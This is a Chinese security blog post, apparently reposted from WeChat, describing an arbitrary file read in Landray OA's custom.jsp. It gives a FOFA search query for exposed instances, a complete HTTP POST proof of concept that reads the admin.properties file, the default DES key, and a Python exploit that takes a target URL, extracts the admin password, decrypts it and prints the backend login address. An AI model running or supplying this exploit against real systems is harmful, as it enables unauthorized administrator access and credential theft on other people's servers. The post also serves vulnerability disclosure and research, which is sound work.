蓝凌OA系统存在任意文件读取（SSRF)

admin

102205
文章

87
评论

2022年6月8日06:55:26评论643 views字数 2372阅读7分54秒阅读模式

漏洞简介

深圳市蓝凌软件股份有限公司存在SSRF任意文件读取漏洞，攻击者可通过改漏洞获得管理员的密码进入后台。

FOFA语句

app="Landray-OA系统"

影响范围

蓝凌OA

漏洞复现

蓝凌OA custom.jsp 任意文件读取漏洞读取加密的密码

POC

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: xxx.xxx.xxx.xxxCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: JSESSIONID=611A290CFE623E17EF4BFB89BA413020Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 62

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

蓝凌OA系统存在任意文件读取（SSRF)

密码是采用的DES加密，默认的密钥是KmssAdminKey

通过在线解密网站进行解密：http://tool.chacuo.net/cryptdes

蓝凌OA系统存在任意文件读取（SSRF)

得到后台密码

访问后台登录地址进行登录：http://xxx.xxx.xxx.xxx/admin.do

蓝凌OA系统存在任意文件读取（SSRF)

成功登录后台

EXP(自动解密)

import requestsimport sysimport refrom pyDes import des, ECB, PAD_PKCS5import base64from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告

url = input('输入url>>>:')if url.startswith('http:') != 1 and url.startswith('https:') != 1:    url = 'http://' + urlurl =url
def lanling2():     url1 =url    url2 =url1+'/sys/ui/extend/varkind/custom.jsp'    headers={    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",    "Content-Type":"application/x-www-form-urlencoded"            }    data='var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'    try:        r = requests.post(url=url2,headers=headers,data=data,verify=False,timeout=10)        if r.status_code == 200 and 'password' in r.text:            print(url+'存在蓝凌OA SSRF')            print('登录地址：'+url+'/admin.do')            data = r.text.strip()            data =str(data)            data1 = data.split()            data2 = ''.join(data1)            #print(data2)            password = re.findall(r"password=(.*?)\rkmss",data2,re.I | re.M)            password1 = str(password)            #print(password)            KEY = 'kmssAdmi'            try:                secret_key = KEY                iv = secret_key                k = des(secret_key, ECB, iv, pad=None, padmode=PAD_PKCS5)                decrystr = k.decrypt(base64.b64decode(password1))                #print(decrystr)                decrystr2 = str(decrystr, 'utf-8').strip(':')                print('++++++'+'后台密码为:' + decrystr2)            except Exception as e:                print('解密失败')
        else:            print(url+'不存在蓝凌OA SSRF')
    except Exception as e:        print(url+'异常退出')


lanling2()

exp运行效果如下

蓝凌OA系统存在任意文件读取（SSRF)

输入存在漏洞的url可获得解密后的密码直接登录后台

CSDN:https://blog.csdn.net/Kris__zhang

原文始发于微信公众号（鹏组安全）：蓝凌OA系统存在任意文件读取（SSRF)

左青龙
微信扫一扫

右白虎
微信扫一扫

蓝凌OA系统存在任意文件读取（SSRF)

浅谈API漏洞挖掘

滥⽤分叉完成代码注⼊对抗EDR

记一次参数走私导致的权限绕过

高级黑客技术-5. 反向Shell/Shell

第91篇：shiro反序列化漏洞绕waf防护的方法总结（上篇）

hacker10101

主权与信任：网络时代的供应链安全

深入了解DHCP

护网怎么做，护网前、护网中，护网后，总共60道工序，一道一道讲清楚

【论文速读】|大语言模型（LLM）智能体可以自主利用1-day漏洞

发表评论

在线咨询

微信